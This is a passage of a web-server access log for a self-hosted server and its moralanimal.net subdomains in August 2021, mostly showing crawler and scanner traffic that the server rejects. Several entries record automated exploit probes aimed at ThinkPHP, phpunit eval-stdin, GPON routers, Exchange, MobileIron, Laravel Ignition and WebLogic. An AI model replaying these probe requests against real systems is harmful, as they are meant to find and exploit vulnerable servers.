0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [05/Aug/2021:22:06:30 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Aug/2021:22:06:31 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [05/Aug/2021:22:55:00 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.212.11] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Aug/2021:00:04:35 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:00:04:35 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:00:07:41 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:00:07:41 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:00:47:46 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.79] [Length 0] [Gzip -] "curl/7.3.2" "-" [06/Aug/2021:01:38:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.33.85.187] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [06/Aug/2021:01:48:53 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [06/Aug/2021:01:49:30 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [06/Aug/2021:01:50:27 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [06/Aug/2021:04:42:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.69] [Length 0] [Gzip -] "-" "-" [06/Aug/2021:05:52:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.37] [Length 0] [Gzip -] "-" "-" [06/Aug/2021:05:52:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.37] [Length 252] [Gzip -] "-" "-" [06/Aug/2021:05:52:27 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.37] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [06/Aug/2021:06:35:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [06/Aug/2021:07:14:48 +0000] 400 - - http localhost "-" [Client 45.227.254.8] [Length 154] [Gzip -] "-" "-" [06/Aug/2021:07:21:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [06/Aug/2021:07:24:19 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Aug/2021:08:08:03 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [06/Aug/2021:08:24:22 +0000] 400 - - http localhost "-" [Client 45.227.254.8] [Length 154] [Gzip -] "-" "-" [06/Aug/2021:09:28:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.39] [Length 0] [Gzip -] "-" "-" [06/Aug/2021:09:28:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.39] [Length 252] [Gzip -] "-" "-" [06/Aug/2021:09:28:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.39] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [06/Aug/2021:09:38:05 +0000] 400 - - http localhost "-" [Client 45.227.254.8] [Length 154] [Gzip -] "-" "-" [06/Aug/2021:09:44:25 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:09:44:26 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:09:55:35 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:09:55:35 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:10:02:58 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.215.243] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Aug/2021:11:19:01 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:11:19:02 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:11:33:41 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:11:33:41 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:13:50:51 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:13:50:51 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:14:35:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Aug/2021:14:55:41 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:41 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:42 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:44 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:46 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:47 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [06/Aug/2021:14:55:48 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:49 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:50 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:51 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:14:55:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Aug/2021:15:16:30 +0000] 444 - POST https 64.22.31.253 "/t3" [Client 212.41.22.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" "-" [06/Aug/2021:15:18:39 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:15:18:39 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:16:18:59 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [06/Aug/2021:16:42:52 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.220.223] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Aug/2021:16:52:42 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Aug/2021:17:05:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.218.6] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Aug/2021:17:14:25 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.214.165] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Aug/2021:17:36:46 +0000] 400 - - http localhost "-" [Client 91.220.163.60] [Length 154] [Gzip -] "-" "-" [06/Aug/2021:17:40:55 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:17:40:56 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:18:05:33 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:18:05:34 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:20:39:08 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Aug/2021:20:39:08 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Aug/2021:20:39:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Aug/2021:20:39:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Aug/2021:20:39:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Aug/2021:20:39:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Aug/2021:21:22:38 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:21:22:38 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:21:36:35 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:21:36:35 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:22:57:47 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.220.119] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Aug/2021:23:06:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Aug/2021:23:55:27 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [06/Aug/2021:23:55:28 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Aug/2021:01:59:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Aug/2021:02:46:36 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [07/Aug/2021:05:34:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [07/Aug/2021:06:16:39 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [07/Aug/2021:06:16:39 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:42 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:43 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:45 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:46 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:49 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:49 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:54 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:54 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:16:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Aug/2021:06:20:20 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Aug/2021:06:20:20 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Aug/2021:06:20:21 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Aug/2021:06:42:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Aug/2021:08:10:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.173.35.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [07/Aug/2021:08:19:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Aug/2021:09:02:40 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 61.135.15.189] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [07/Aug/2021:09:39:16 +0000] 444 - GET https pop.moralanimal.net "/" [Client 124.126.78.189] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [07/Aug/2021:10:03:31 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.64] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Aug/2021:10:17:03 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Aug/2021:10:17:03 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Aug/2021:10:17:03 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [07/Aug/2021:10:56:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Aug/2021:13:30:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.39] [Length 0] [Gzip -] "-" "-" [07/Aug/2021:13:30:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.39] [Length 252] [Gzip -] "-" "-" [07/Aug/2021:13:30:22 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.39] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [07/Aug/2021:14:26:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.37] [Length 0] [Gzip -] "-" "-" [07/Aug/2021:14:26:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.37] [Length 252] [Gzip -] "-" "-" [07/Aug/2021:14:26:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.37] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [07/Aug/2021:16:45:52 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.215.51] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Aug/2021:16:56:44 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.95] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Aug/2021:17:00:51 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Aug/2021:17:00:51 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Aug/2021:17:00:51 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Aug/2021:17:00:51 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Aug/2021:17:00:51 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Aug/2021:17:00:51 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Aug/2021:17:06:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.218.14] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Aug/2021:17:18:36 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.207.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Aug/2021:17:21:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Aug/2021:20:01:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.189.160.161] [Length 0] [Gzip -] "libwww-perl/6.05" "-" [07/Aug/2021:23:00:03 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 